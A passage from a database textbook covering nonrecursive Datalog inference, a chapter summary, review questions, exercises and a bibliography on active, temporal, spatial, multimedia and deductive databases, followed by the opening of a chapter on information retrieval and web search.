When a query involves rule-defined predicates, the inference mechanism must compute the result based on the rule definitions. If a query is nonrecursive and involves a predicate p that appears as the head of a rule p :– p1, p2, ..., pn, the strategy is first to compute the relations corresponding to p1, p2, ..., pn and then to compute the relation corresponding to p. It is useful to keep track of the dependency among the predicates of a deductive database in a predicate dependency graph. Figure 17 shows the graph for the fact and rule predicates shown in Figures 14 and 15. The dependency graph contains a node for each predicate. Whenever a predicate A is specified in the body (RHS) of a rule, and the head (LHS) of that rule is the predicate B, we say that B depends on A, and we draw a directed edge from A to B. This indicates that in order to compute the facts for the predicate B (the rule head), we must first compute the facts for all the predicates A in the rule body. If the dependency graph has no cycles, we call the rule set nonrecursive. If there is at least one cycle, we call the rule set recursive. In Figure 17, there is one recursively defined predicate—namely, SUPERIOR—which has a recursive edge pointing back to itself. Additionally, because the predicate SUBORDINATE depends on SUPERIOR, it also requires recursion in computing its result.

A query that includes only nonrecursive predicates is called a nonrecursive query. In this section we discuss only inference mechanisms for nonrecursive queries. In Figure 17, any query that does not involve the predicates SUBORDINATE or SUPERIOR is nonrecursive. In the predicate dependency graph, the nodes corresponding to fact-defined predicates do not have any incoming edges, since all fact-defined predicates have their facts stored in a database relation.
The contents of a fact-defined predicate can be computed by directly retrieving the tuples in the corresponding database relation.

The main function of an inference mechanism is to compute the facts that correspond to query predicates. This can be accomplished by generating a relational expression involving relational operators such as SELECT, PROJECT, JOIN, UNION, and SET DIFFERENCE (with appropriate provision for dealing with safety issues) that, when executed, provides the query result. The query can then be executed by utilizing the internal query processing and optimization operations of a relational database management system. Whenever the inference mechanism needs to compute the fact set corresponding to a nonrecursive rule-defined predicate p, it first locates all the rules that have p as their head. The idea is to compute the fact set for each such rule and then to apply the UNION operation to the results, since UNION corresponds to a logical OR operation. The dependency graph indicates all predicates q on which each p depends, and since we assume that the predicate is nonrecursive, we can always determine a partial order among such predicates q. Before computing the fact set for p, first we compute the fact sets for all predicates q on which p depends, based on their partial order. For example, if a query involves the predicate UNDER_40K_SUPERVISOR, we must first compute both SUPERVISOR and OVER_40K_EMP. Since the latter two depend only on the fact-defined predicates EMPLOYEE, SALARY, and SUPERVISE, they can be computed directly from the stored database relations.

This concludes our introduction to deductive databases. We have included an extensive bibliography of work in deductive databases, recursive query processing, magic sets, the combination of relational databases with deductive rules, and the GLUE-NAIL! system at the end of this chapter.

6 Summary
In this chapter we introduced database concepts for some of the common features that are needed by advanced applications: active databases, temporal databases, spatial databases, multimedia databases, and deductive databases. It is important to note that each of these is a broad topic and warrants a complete textbook.

First we introduced the topic of active databases, which provide additional functionality for specifying active rules. We introduced the Event-Condition-Action (ECA) model for active databases. The rules can be automatically triggered by events that occur—such as a database update—and they can initiate certain actions that have been specified in the rule declaration if certain conditions are true. Many commercial packages have some of the functionality provided by active databases in the form of triggers. We discussed the different options for specifying rules, such as row-level versus statement-level, before versus after, and immediate versus deferred. We gave examples of row-level triggers in the Oracle commercial system, and statement-level rules in the STARBURST experimental system. The syntax for triggers in the SQL-99 standard was also discussed. We briefly discussed some design issues and some possible applications for active databases.

Next we introduced some of the concepts of temporal databases, which permit the database system to store a history of changes and allow users to query both current and past states of the database.
We discussed how time is represented and distinguished between the valid time and transaction time dimensions. We discussed how valid time, transaction time, and bitemporal relations can be implemented using tuple versioning in the relational model, with examples to illustrate how updates, inserts, and deletes are implemented. We also showed how complex objects can be used to implement temporal databases using attribute versioning. We looked at some of the querying operations for temporal relational databases and gave a brief introduction to the TSQL2 language.

Then we turned to spatial databases. Spatial databases provide concepts for databases that keep track of objects that have spatial characteristics. We discussed the types of spatial data, types of operators for processing spatial data, types of spatial queries, and spatial indexing techniques, including the popular R-trees. Then we discussed some spatial data mining techniques and applications of spatial data.

We discussed some basic types of multimedia databases and their important characteristics. Multimedia databases provide features that allow users to store and query different types of multimedia information, which includes images (such as pictures and drawings), video clips (such as movies, newsreels, and home videos), audio clips (such as songs, phone messages, and speeches), and documents (such as books and articles). We provided a brief overview of the various types of media sources and how multimedia sources may be indexed. Images are an extremely common type of data among databases today and are likely to occupy a large proportion of stored data in databases. We therefore provided a more detailed treatment of images: their automatic analysis, recognition of objects within images, and their semantic tagging—all of which contribute to developing better systems to retrieve images by content, which still remains a challenging problem. We also commented on the analysis of audio data sources.

We concluded the chapter with an introduction to deductive databases. We gave an overview of Prolog and Datalog notation. We discussed the clausal form of formulas. Datalog rules are restricted to Horn clauses, which contain at most one positive literal. We discussed the proof-theoretic and model-theoretic interpretation of rules. We briefly discussed Datalog rules and their safety and the ways of expressing relational operators using Datalog rules. Finally, we discussed an inference mechanism based on relational operations that can be used to evaluate nonrecursive Datalog queries using relational query optimization techniques. While Datalog has been a popular language with many applications, unfortunately, implementations of deductive database systems such as LDL or VALIDITY have not become widely commercially available.

Review Questions
1. What are the differences between row-level and statement-level active rules?
2. What are the differences among immediate, deferred, and detached consideration of active rule conditions?
3. What are the differences among immediate, deferred, and detached execution of active rule actions?
4. Briefly discuss the consistency and termination problems when designing a set of active rules.
5. Discuss some applications of active databases.
6. Discuss how time is represented in temporal databases and compare the different time dimensions.
7. What are the differences between valid time, transaction time, and bitemporal relations?
8. Describe how the insert, delete, and update commands should be implemented on a valid time relation.
9. Describe how the insert, delete, and update commands should be implemented on a bitemporal relation.
10. Describe how the insert, delete, and update commands should be implemented on a transaction time relation.
11. What are the main differences between tuple versioning and attribute versioning?
12. How do spatial databases differ from regular databases?
13. What are the different types of spatial data?
14. Name the main types of spatial operators and different classes of spatial queries.
15. What are the properties of R-trees that act as an index for spatial data?
16. Describe how a spatial join index between spatial objects can be constructed.
17. What are the different types of spatial data mining?
18. State the general form of a spatial association rule. Give an example of a spatial association rule.
19. What are the different types of multimedia sources?
20. How are multimedia sources indexed for content-based retrieval?
21. What important features of images are used to compare them?
22. What are the different approaches to recognizing objects in images?
23. How is semantic tagging of images used?
24. What are the difficulties in analyzing audio sources?
25. What are deductive databases?
26. Write sample rules in Prolog to define that courses with course number above CS5000 are graduate courses and that DBgrads are those graduate students who enroll in CS6400 and CS8803.
27. Define clausal form of formulas and Horn clauses.
28. What is theorem proving and what is proof-theoretic interpretation of rules?
29. What is model-theoretic interpretation and how does it differ from proof-theoretic interpretation?
30. What are fact-defined predicates and rule-defined predicates?
31. What is a safe rule?
32. Give examples of rules that can define relational operations SELECT, PROJECT, JOIN, and SET operations.
33. Discuss the inference mechanism based on relational operations that can be applied to evaluate nonrecursive Datalog queries.

Exercises
34. Consider the COMPANY database described in Figure A.1. Using the syntax of Oracle triggers, write active rules to do the following:
a. Whenever an employee's project assignments are changed, check if the total hours per week spent on the employee's projects are less than 30 or greater than 40; if so, notify the employee's direct supervisor.
b. Whenever an employee is deleted, delete the PROJECT tuples and DEPENDENT tuples related to that employee, and if the employee manages a department or supervises employees, set the Mgr_ssn for that department to NULL and set the Super_ssn for those employees to NULL.
35. Repeat Exercise 34, but use the syntax of STARBURST active rules.
36. Consider the relational schema shown in Figure 18. Write active rules for keeping the Sum_commissions attribute of SALES_PERSON equal to the sum of the Commission attribute in SALES for each salesperson. Your rules should also check if the Sum_commissions exceeds 100000; if it does, call a procedure Notify_manager(S_id). Write both statement-level rules in STARBURST notation and row-level rules in Oracle.

SALES(S_id, V_id, Commission)
SALES_PERSON(Salesperson_id, Name, Title, Phone, Sum_commissions)

Figure 18
Database schema for sales and salesperson commissions in Exercise 36.

37. Consider the UNIVERSITY EER schema in Figure A.2.
Write some rules (in English) that could be implemented via active rules to enforce some common integrity constraints that you think are relevant to this application.
38. Discuss which of the updates that created each of the tuples shown in Figure 9 were applied retroactively and which were applied proactively.
39. Show how the following updates, if applied in sequence, would change the contents of the bitemporal EMP_BT relation in Figure 9. For each update, state whether it is a retroactive or proactive update.
a. On 2004-03-10,17:30:00, the salary of Narayan is updated to 40000, effective on 2004-03-01.
b. On 2003-07-30,08:31:00, the salary of Smith was corrected to show that it should have been entered as 31000 (instead of 30000 as shown), effective on 2003-06-01.
c. On 2004-03-18,08:31:00, the database was changed to indicate that Narayan was leaving the company (that is, logically deleted) effective on 2004-03-31.
d. On 2004-04-20,14:07:33, the database was changed to indicate the hiring of a new employee called Johnson, with the tuple <‘Johnson’, ‘334455667’, 1, NULL> effective on 2004-04-20.

e. On 2004-04-28,12:54:02, the database was changed to indicate that Wong
was leaving the company (that is, logically deleted) effective on 2004-06-
01.

f. On 2004-05-05,13:07:33, the database was changed to indicate the rehir-
ing of Brown, with the same department and supervisor but with salary
35000 effective on 2004-05-01.

40. Show how the updates given in Exercise 39, if applied in sequence, would
change the contents of the valid time EMP_VT relation in Figure 8.

41. Add the following facts to the sample database in Figure 11:

SUPERVISE(ahmad, bob), SUPERVISE(franklin, gwen).

First modify the supervisory tree in Figure 11(b) to reflect this change. Then
construct a diagram showing the top-down evaluation of the query
SUPERIOR(james, Y) using rules 1 and 2 from Figure 12.


42. Consider the following set of facts for the relation PARENT(X, Y), where Y is
the parent of X:

PARENT(a, aa), PARENT(a, ab), PARENT(aa, aaa), PARENT(aa, aab),
PARENT(aaa, aaaa), PARENT(aaa, aaab).

Consider the rules

r1: ANCESTOR(X, Y) :– PARENT(X, Y)
r2: ANCESTOR(X, Y) :– PARENT(X, Z), ANCESTOR(Z, Y)

which define ancestor Y of X as above.

a. Show how to solve the Datalog query

ANCESTOR(aa, X)?

and show your work at each step.

b. Show the same query by computing only the changes in the ancestor rela-
tion and using that in rule 2 each time.

[This question is derived from Bancilhon and Ramakrishnan (1986).]

43. Consider a deductive database with the following rules:

ANCESTOR(X, Y) :– FATHER(X, Y)
ANCESTOR(X, Y) :– FATHER(X, Z), ANCESTOR(Z, Y)

Notice that FATHER(X, Y) means that Y is the father of X; ANCESTOR(X, Y)
means that Y is the ancestor of X.

Consider the following fact base:

FATHER(Harry, Issac), FATHER(Issac, John), FATHER(John, Kurt).

a. Construct a model-theoretic interpretation of the above rules using the
given facts.

b. Consider that a database contains the above relations FATHER(X, Y ),
another relation BROTHER(X, Y ), and a third relation BIRTH(X, B ),
where B is the birth date of person X. State a rule that computes the first
cousins of the following variety: their fathers must be brothers.

c. Show a complete Datalog program with fact-based and rule-based literals
that computes the following relation: list of pairs of cousins, where the
first person is born after 1960 and the second after 1970. You may use
greater than as a built-in predicate. (Note: Sample facts for brother, birth,
and person must also be shown.)

44. Consider the following rules:

REACHABLE(X, Y) :– FLIGHT(X, Y)
REACHABLE(X, Y) :– FLIGHT(X, Z), REACHABLE(Z, Y)

where REACHABLE(X, Y) means that city Y can be reached from city X, and
FLIGHT(X, Y) means that there is a flight to city Y from city X.


a. Construct fact predicates that describe the following:

i. Los Angeles, New York, Chicago, Atlanta, Frankfurt, Paris, Singapore,
Sydney are cities.

ii. The following flights exist: LA to NY, NY to Atlanta, Atlanta to
Frankfurt, Frankfurt to Atlanta, Frankfurt to Singapore, and
Singapore to Sydney. (Note: No flight in reverse direction can be auto-
matically assumed.)

b. Is the given data cyclic? If so, in what sense?

c. Construct a model-theoretic interpretation (that is, an interpretation
similar to the one shown in Figure 13) of the above facts and rules.

d. Consider the query

REACHABLE(Atlanta, Sydney)?

How will this query be executed? List the series of steps it will go through.

e. Consider the following rule-defined predicates:

ROUND-TRIP-REACHABLE(X, Y) :–
REACHABLE(X, Y), REACHABLE(Y, X)

DURATION(X, Y, Z)

Draw a predicate dependency graph for the above predicates. (Note:
DURATION(X, Y, Z) means that you can take a flight from X to Y in Z
hours.)

f. Consider the following query: What cities are reachable in 12 hours from
Atlanta? Show how to express it in Datalog. Assume built-in predicates
like greater-than(X, Y). Can this be converted into a relational algebra
statement in a straightforward way? Why or why not?

g. Consider the predicate population(X, Y), where Y is the population of
city X. Consider the following query: List all possible bindings of the
predicate pair (X, Y), where Y is a city that can be reached in two flights
from city X, which has over 1 million people. Show this query in Datalog.
Draw a corresponding query tree in relational algebraic terms.

Selected Bibliography
The book by Zaniolo et al. (1997) consists of several parts, each describing an
advanced database concept such as active, temporal, and spatial/text/multimedia
databases. Widom and Ceri (1996) and Ceri and Fraternali (1997) focus on active
database concepts and systems. Snodgrass (1995) describes the TSQL2 language
and data model. Khoshafian and Baker (1996), Faloutsos (1996), and
Subrahmanian (1998) describe multimedia database concepts. Tansel et al. (1993) is
a collection of chapters on temporal databases.

STARBURST rules are described in Widom and Finkelstein (1990). Early work on
active databases includes the HiPAC project, discussed in Chakravarthy et al. (1989)


and Chakravarthy (1990). A glossary for temporal databases is given in Jensen et al.
(1994). Snodgrass (1987) focuses on TQuel, an early temporal query language.

Temporal normalization is defined in Navathe and Ahmed (1989). Paton (1999)
and Paton and Diaz (1999) survey active databases. Chakravarthy et al. (1994)
describe SENTINEL and object-based active systems. Lee et al. (1998) discuss time
series management.

The book by Shekhar and Chawla (2003) consists of all aspects of spatial databases
including spatial data models, spatial storage and indexing, and spatial data mining.
Scholl et al. (2001) is another textbook on spatial data management. Albrecht
(1996) describes in detail the various GIS analysis operations. Clementini and Di
Felice (1993) give a detailed description of the spatial operators. Güting (1994)
describes the spatial data structures and querying languages for spatial database sys-
tems. Guttman (1984) proposed R-trees for spatial data indexing. Manolopoulos et
al. (2005) is a book on the theory and applications of R-trees. Papadias et al. (2003)
discuss query processing using R-trees for spatial networks. Ester et al. (2001) pro-
vide a comprehensive discussion on the algorithms and applications of spatial data
mining. Koperski and Han (1995) discuss association rule discovery from geo-
graphic databases. Brinkhoff et al. (1993) provide a comprehensive overview of the
usage of R-trees for efficient processing of spatial joins. Rotem (1991) describes spa-
tial join indexes comprehensively. Shekhar and Xiong (2008) is a compilation of
various sources that discuss different aspects of spatial database management sys-
tems and GIS. The density-based clustering algorithms DBSCAN and DENCLUE
are proposed by Ester et al. (1996) and Hinneburg and Gabriel (2007), respectively.

Multimedia database modeling has a vast amount of literature—it is difficult to
point to all important references here. IBM’s QBIC (Query By Image Content) sys-
tem described in Niblack et al. (1998) was one of the first comprehensive approaches
for querying images based on content. It is now available as a part of IBM’s DB2
database image extender. Zhao and Grosky (2002) discuss content-based image
retrieval. Carneiro and Vasconcelos (2005) present a database-centric view of seman-
tic image annotation and retrieval. Content-based retrieval of subimages is discussed
by Luo and Nascimento (2004). Tuceryan and Jain (1998) discuss various aspects of
texture analysis. Object recognition using SIFT is discussed in Lowe (2004). Lazebnik
et al. (2004) describe the use of local affine regions to model 3D objects (RIFT).
Among other object recognition approaches, G-RIF is described in Kim et al. (2006),
Bay et al. (2006) discuss SURF, Ke and Sukthankar (2004) present PCA-SIFT, and
Mikolajczyk and Schmid (2005) describe GLOH. Fan et al. (2004) present a tech-
nique for automatic image annotation by using concept-sensitive objects. Fotouhi et
al. (2007) was the first international workshop on many faces of multimedia seman-
tics, which is continuing annually. Thuraisingham (2001) classifies audio data into
different categories, and by treating each of these categories differently, elaborates on
the use of metadata for audio. Prabhakaran (1996) has also discussed how speech
processing techniques can add valuable metadata information to the audio piece.

The early developments of the logic and database approach are surveyed by Gallaire
et al. (1984). Reiter (1984) provides a reconstruction of relational database theory,


while Levesque (1984) provides a discussion of incomplete knowledge in light of
logic. Gallaire and Minker (1978) provide an early book on this topic. A detailed
treatment of logic and databases appears in Ullman (1989, Volume 2), and there is a
related chapter in Volume 1 (1988). Ceri, Gottlob, and Tanca (1990) present a com-
prehensive yet concise treatment of logic and databases. Das (1992) is a comprehen-
sive book on deductive databases and logic programming. The early history of
Datalog is covered in Maier and Warren (1988). Clocksin and Mellish (2003) is an
excellent reference on Prolog language.

Aho and Ullman (1979) provide an early algorithm for dealing with recursive
queries, using the least fixed-point operator. Bancilhon and Ramakrishnan (1986)
give an excellent and detailed description of the approaches to recursive query pro-
cessing, with detailed examples of the naive and seminaive approaches. Excellent
survey articles on deductive databases and recursive query processing include
Warren (1992) and Ramakrishnan and Ullman (1995). A complete description of
the seminaive approach based on relational algebra is given in Bancilhon (1985).
Other approaches to recursive query processing include the recursive query/sub-
query strategy of Vieille (1986), which is a top-down interpreted strategy, and the
Henschen-Naqvi (1984) top-down compiled iterative strategy. Balbin and
Ramamohanrao (1987) discuss an extension of the seminaive differential approach
for multiple predicates.

The original paper on magic sets is by Bancilhon et al. (1986). Beeri and
Ramakrishnan (1987) extend it. Mumick et al. (1990a) show the applicability of
magic sets to nonrecursive nested SQL queries. Other approaches to optimizing rules
without rewriting them appear in Vieille (1986, 1987). Kifer and Lozinskii (1986)
propose a different technique. Bry (1990) discusses how the top-down and bottom-
up approaches can be reconciled. Whang and Navathe (1992) describe an extended
disjunctive normal form technique to deal with recursion in relational algebra
expressions for providing an expert system interface over a relational DBMS.

Chang (1981) describes an early system for combining deductive rules with rela-
tional databases. The LDL system prototype is described in Chimenti et al. (1990).
Krishnamurthy and Naqvi (1989) introduce the choice notion in LDL. Zaniolo
(1988) discusses the language issues for the LDL system. A language overview of
CORAL is provided in Ramakrishnan et al. (1992), and the implementation is
described in Ramakrishnan et al. (1993). An extension to support object-oriented
features, called CORAL++, is described in Srivastava et al. (1993). Ullman (1985)
provides the basis for the NAIL! system, which is described in Morris et al. (1987).
Phipps et al. (1991) describe the GLUE-NAIL! deductive database system.

Zaniolo (1990) reviews the theoretical background and the practical importance of
deductive databases. Nicolas (1997) gives an excellent history of the developments
leading up to Deductive Object-Oriented Database (DOOD) systems. Falcone et al.
(1997) survey the DOOD landscape. References on the VALIDITY system include
Friesen et al. (1995), Vieille (1998), and Dietrich et al. (1999).


Figure A.1
One possible database state for the COMPANY relational database schema, comprising the relations EMPLOYEE, DEPARTMENT, DEPT_LOCATIONS, PROJECT, WORKS_ON, and DEPENDENT.


Figure A.2
A UML class diagram for the UNIVERSITY database, with the classes PERSON, EMPLOYEE, ALUMNUS, STUDENT, STAFF, FACULTY, STUDENT_ASSISTANT, RESEARCH_ASSISTANT, TEACHING_ASSISTANT, GRADUATE_STUDENT, UNDERGRADUATE_STUDENT, and DEGREE.


Introduction to Information
Retrieval and Web Search1

Information retrieval deals mainly with unstructured data, and the techniques for indexing, searching, and
retrieving information from large collections of unstructured documents. In this
chapter we will provide an introduction to information retrieval. This is a very
broad topic, so we will focus on the similarities and differences between informa-
tion retrieval and database technologies, and on the indexing techniques that form
the basis of many information retrieval systems.

This chapter is organized as follows. In Section 1 we introduce information retrieval
(IR) concepts and discuss how IR differs from traditional databases. Section 2 is
devoted to a discussion of retrieval models, which form the basis for IR search.
Section 3 covers different types of queries in IR systems. Section 4 discusses text pre-
processing, and Section 5 provides an overview of IR indexing, which is at the heart
of any IR system. In Section 6 we describe the various evaluation metrics for IR sys-
tems performance. Section 7 details Web analysis and its relationship to informa-
tion retrieval, and Section 8 briefly introduces the current trends in IR. Section 9
summarizes the chapter. For a limited overview of IR, we suggest that students read
Sections 1 through 6.

1This chapter is coauthored with Saurav Sahay of the Georgia Institute of Technology.

From Chapter 27 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.



1 Information Retrieval (IR) Concepts
Information retrieval is the process of retrieving documents from a collection in
response to a query (or a search request) by a user. This section provides an
overview of information retrieval (IR) concepts. In Section 1.1, we introduce infor-
mation retrieval in general and then discuss the different kinds and levels of search
that IR encompasses. In Section 1.2, we compare IR and database technologies.
Section 1.3 gives a brief history of IR. We then present the different modes of user
interaction with IR systems in Section 1.4. In Section 1.5, we describe the typical IR
process with a detailed set of tasks and then with a simplified process flow, and end
with a brief discussion of digital libraries and the Web.

1.1 Introduction to Information Retrieval
We first review the distinction between structured and unstructured data to see how
information retrieval differs from structured data management. Consider a relation
(or table) called HOUSES with the attributes:

HOUSES(Lot#, Address, Square_footage, Listed_price)

This is an example of structured data. We can compare this relation with home-
buying contract documents, which are examples of unstructured data. These types
of documents can vary from city to city, and even county to county, within a given
state in the United States. Typically, a contract document in a particular state will
have a standard list of clauses described in paragraphs within sections of the docu-
ment, with some predetermined (fixed) text and some variable areas whose content
is to be supplied by the specific buyer and seller. Other variable information would
include interest rate for financing, down-payment amount, closing dates, and so on.
The documents could also possibly include some pictures taken during a home
inspection. The information content in such documents can be considered
unstructured data that can be stored in a variety of possible arrangements and for-
mats. By unstructured information, we generally mean information that does not
have a well-defined formal model and corresponding formal language for represen-
tation and reasoning, but rather is based on understanding of natural language.

With the advent of the World Wide Web (or Web, for short), the volume of unstruc-
tured information stored in messages and documents that contain textual and mul-
timedia information has exploded. These documents are stored in a variety of
standard formats, including HTML, XML, and several audio and video formatting
standards. Information retrieval deals with the problems of storing, indexing, and
retrieving (searching) such information to satisfy the needs of users. The problems
that IR deals with are exacerbated by the fact that the number of Web pages and the
number of social interaction events is already in the billions, and is growing at a
phenomenal rate. All forms of unstructured data described above are being added at
the rates of millions per day, expanding the searchable space on the Web at rapidly
increasing rates.


Historically, information retrieval is “the discipline that deals with the structure,
analysis, organization, storage, searching, and retrieval of information” as defined
by Gerald Salton, an IR pioneer.2 We can enhance the definition slightly to say that
it applies in the context of unstructured documents to satisfy a user’s information
needs. This field has existed even longer than the database field, and was originally
concerned with retrieval of cataloged information in libraries based on titles,
authors, topics, and keywords. In academic programs, the field of IR has long been a
part of Library and Information Science programs. Information in the context of IR
does not require machine-understandable structures, such as in relational database
systems. Examples of such information include written texts, abstracts, documents,
books, Web pages, e-mails, instant messages, and collections from digital libraries.
Therefore, all loosely represented (unstructured) or semistructured information is
also part of the IR discipline.

RDBMS (relational database management system) vendors are providing modules
to support data types, including spatial, temporal, and multimedia data, as well as
XML data, in the newer versions of their products, sometimes referred to as
extended RDBMSs, or object-relational database management systems (ORDBMSs).
The challenge of dealing with unstructured data is largely an information retrieval
problem, although database researchers have been applying database indexing and
search techniques to some of these problems.

IR systems go beyond database systems in that they do not limit the user to a spe-
cific query language, nor do they expect the user to know the structure (schema) or
content of a particular database. IR systems use a user’s information need expressed
as a free-form search request (sometimes called a keyword search query, or just
query) for interpretation by the system. Whereas the IR field historically dealt with
cataloging, processing, and accessing text in the form of documents for decades, in
today’s world the use of Web search engines is becoming the dominant way to find
information. The traditional problems of text indexing and making collections of
documents searchable have been transformed by making the Web itself into a
quickly accessible repository of human knowledge.

An IR system can be characterized at different levels: by types of users, types of data,
and the types of the information need, along with the size and scale of the informa-
tion repository it addresses. Different IR systems are designed to address specific
problems that require a combination of different characteristics. These characteris-
tics can be briefly described as follows:

Types of Users. The user may be an expert user (for example, a curator or a
librarian), who is searching for specific information that is clear in his/her mind
and forms relevant queries for the task, or a layperson user with a generic infor-
mation need. The latter cannot create highly relevant queries for search (for
example, students trying to find information about a new topic, researchers try-
ing to assimilate different points of view about a historical issue, a scientist ver-
ifying a claim by another scientist, or a person trying to shop for clothing).

2See Salton’s 1968 book entitled Automatic Information Organization and Retrieval.

Types of Data. Search systems can be tailored to specific types of data. For
example, the problem of retrieving information about a specific topic may be
handled more efficiently by customized search systems that are built to collect
and retrieve only information related to that specific topic. The information
repository could be hierarchically organized based on a concept or topic hierar-
chy. These topical domain-specific or vertical IR systems are not as large as or as
diverse as the generic World Wide Web, which contains information on all
kinds of topics. Given that these domain-specific collections exist and may have
been acquired through a specific process, they can be exploited much more effi-
ciently by a specialized system.

Types of Information Need. In the context of Web search, users’ information
needs may be defined as navigational, informational, or transactional.3

Navigational search refers to finding a particular piece of information (such as
the Georgia Tech University Website) that a user needs quickly. The purpose of
informational search is to find current information about a topic (such as
research activities in the college of computing at Georgia Tech—this is the clas-
sic IR system task). The goal of transactional search is to reach a site where fur-
ther interaction happens (such as joining a social network, product shopping,
online reservations, accessing databases, and so on).

Levels of Scale. In the words of Nobel Laureate Herbert Simon,

What information consumes is rather obvious: it consumes the attention of its
recipients. Hence a wealth of information creates a poverty of attention, and a need
to allocate that attention efficiently among the overabundance of information
sources that might consume it.4

This overabundance of information sources in effect creates a high noise-to-signal
ratio in IR systems. Especially on the Web, where billions of pages are indexed, IR
interfaces are built with efficient scalable algorithms for distributed searching,
indexing, caching, merging, and fault tolerance. IR search engines can be limited in
level to more specific collections of documents. Enterprise search systems offer IR
solutions for searching different entities in an enterprise’s intranet, which consists
of the network of computers within that enterprise. The searchable entities include
e-mails, corporate documents, manuals, charts, and presentations, as well as reports
related to people, meetings, and projects. They still typically deal with hundreds of
millions of entities in large global enterprises. On a smaller scale, there are personal
information systems such as those on desktops and laptops, called desktop search
engines (for example, Google Desktop), for retrieving files, folders, and different
kinds of entities stored on the computer. There are peer-to-peer systems, such as
BitTorrent, which allows sharing of music in the form of audio files, as well as spe-
cialized search engines for audio, such as Lycos and Yahoo! audio search.

3See Broder (2002) for details.
4From Simon (1971), “Designing Organizations for an Information-Rich World.”

1.2 Databases and IR Systems: A Comparison
Within the computer science discipline, databases and IR systems are closely related
fields. Databases deal with structured information retrieval through well-defined
formal languages for representation and manipulation based on the theoretically
founded data models. Efficient algorithms have been developed for operators that
allow rapid execution of complex queries. IR, on the other hand, deals with unstruc-
tured search with possibly vague query or search semantics and without a well-
defined logical schematic representation. Some of the key differences between
databases and IR systems are listed in Table 1.

Table 1 A Comparison of Databases and IR Systems

Databases:
■ Structured data
■ Schema driven
■ Relational (or object, hierarchical, and network) model is predominant
■ Structured query model
■ Rich metadata operations
■ Query returns data
■ Results are based on exact matching (always correct)

IR Systems:
■ Unstructured data
■ No fixed schema; various data models (e.g., vector space model)
■ Free-form query models
■ Rich data operations
■ Search request returns list or pointers to documents
■ Results are based on approximate matching and measures of effectiveness (may be imprecise and ranked)

Whereas databases have fixed schemas defined in some data model such as the rela-
tional model, an IR system has no fixed data model; it views data or documents
according to some scheme, such as the vector space model, to aid in query process-
ing (see Section 2). Databases using the relational model employ SQL for queries
and transactions. The queries are mapped into relational algebra operations and
search algorithms and return a new relation (table) as the query result, providing an
exact answer to the query for the current state of the database. In IR systems, there
is no fixed language for defining the structure (schema) of the document or for
operating on the document—queries tend to be a set of query terms (keywords) or
a free-form natural language phrase. An IR query result is a list of document ids, or
some pieces of text or multimedia objects (images, videos, and so on), or a list of
links to Web pages.

The result of a database query is an exact answer; if no matching records (tuples) are
found in the relation, the result is empty (null). On the other hand, the answer to a
user request in an IR query represents the IR system’s best attempt at retrieving the
information most relevant to that query. Whereas database systems maintain a large
amount of metadata and allow their use in query optimization, the operations in IR
systems rely on the data values themselves and their occurrence frequencies.
Complex statistical analysis is sometimes performed to determine the relevance of
each document or parts of a document to the user request.

1.3 A Brief History of IR
Information retrieval has been a common task since the times of ancient civiliza-
tions, which devised ways to organize, store, and catalog documents and records.
Media such as papyrus scrolls and stone tablets were used to record documented
information in ancient times. These efforts allowed knowledge to be retained and
transferred among generations. With the emergence of public libraries and the
printing press, large-scale methods for producing, collecting, archiving, and distrib-
uting documents and books evolved. As computers and automatic storage systems
emerged, the need to apply these methods to computerized systems arose. Several
techniques emerged in the 1950s, such as the seminal work of H. P. Luhn,5 who pro-
posed using words and their frequency counts as indexing units for documents, and
using measures of word overlap between queries and documents as the retrieval cri-
terion. It was soon realized that storing large amounts of text was not difficult. The
harder task was to search for and retrieve that information selectively for users with
specific information needs. Methods that explored word distribution statistics gave
rise to the choice of keywords based on their distribution properties6 and keyword-
based weighting schemes.

The earlier experiments with document retrieval systems such as SMART7 in the
1960s adopted the inverted file organization based on keywords and their weights as
the method of indexing (see Section 5). Serial (or sequential) organization proved
inadequate if queries required fast, near real-time response times. Proper organiza-
tion of these files became an important area of study; document classification and
clustering schemes ensued. The scale of retrieval experiments remained a challenge
due to lack of availability of large text collections. This soon changed with the World
Wide Web. Also, the Text Retrieval Conference (TREC) was launched by NIST
(National Institute of Standards and Technology) in 1992 as a part of the TIPSTER
program8 with the goal of providing a platform for evaluating information retrieval
methodologies and facilitating technology transfer to develop IR products.

A search engine is a practical application of information retrieval to large-scale
document collections. With significant advances in computers and communica-
tions technologies, people today have interactive access to enormous amounts of
user-generated distributed content on the Web. This has spurred the rapid growth
in search engine technology, where search engines are trying to discover different
kinds of real-time content found on the Web. The part of a search engine responsi-
ble for discovering, analyzing, and indexing these new documents is known as a
crawler. Other types of search engines exist for specific domains of knowledge. For
example, the biomedical literature search database was started in the 1970s and is
now supported by the PubMed search engine,9 which gives access to over 20 million
abstracts.

5See Luhn (1957) “A statistical approach to mechanized encoding and searching of literary information.”
6See Salton, Yang, and Yu (1975).
7For details, see Buckley et al. (1993).
8For details, see Harman (1992).
9See www.ncbi.nlm.nih.gov/pubmed/.

While continuous progress is being made to tailor search results to the needs of an
end user, the challenge remains in providing high-quality, pertinent, and timely
information that is precisely aligned to the information needs of individual users.

1.4 Modes of Interaction in IR Systems
In the beginning of Section 1, we defined information retrieval as the process of
retrieving documents from a collection in response to a query (or a search request)
by a user. Typically the collection is made up of documents containing unstructured
data. Other kinds of documents include images, audio recordings, video strips, and
maps. Data may be scattered nonuniformly in these documents with no definitive
structure. A query is a set of terms (also referred to as keywords) used by the
searcher to specify an information need (for example, the terms ‘databases’ and
‘operating systems’ may be regarded as a query to a computer science bibliographic
database). An informational request or a search query may also be a natural lan-
guage phrase or a question (for example, “What is the currency of China?” or “Find
Italian restaurants in Sarasota, Florida.”).

There are two main modes of interaction with IR systems—retrieval and brows-
ing—which, although similar in goal, are accomplished through different interac-
tion tasks. Retrieval is concerned with the extraction of relevant information from
a repository of documents through an IR query, while browsing signifies the activ-
ity of a user visiting or navigating through similar or related documents based on
the user’s assessment of relevance. During browsing, a user’s information need may
not be defined a priori and is flexible. Consider the following browsing scenario: A
user specifies ‘Atlanta’ as a keyword. The information retrieval system retrieves links
to relevant result documents containing various aspects of Atlanta for the user. The
user comes across the term ‘Georgia Tech’ in one of the returned documents, and
uses some access technique (such as clicking on the phrase ‘Georgia Tech’ in a docu-
ment, which has a built-in link) and visits documents about Georgia Tech in the
same or a different Website (repository). There the user finds an entry for ‘Athletics’
that leads the user to information about various athletic programs at Georgia Tech.
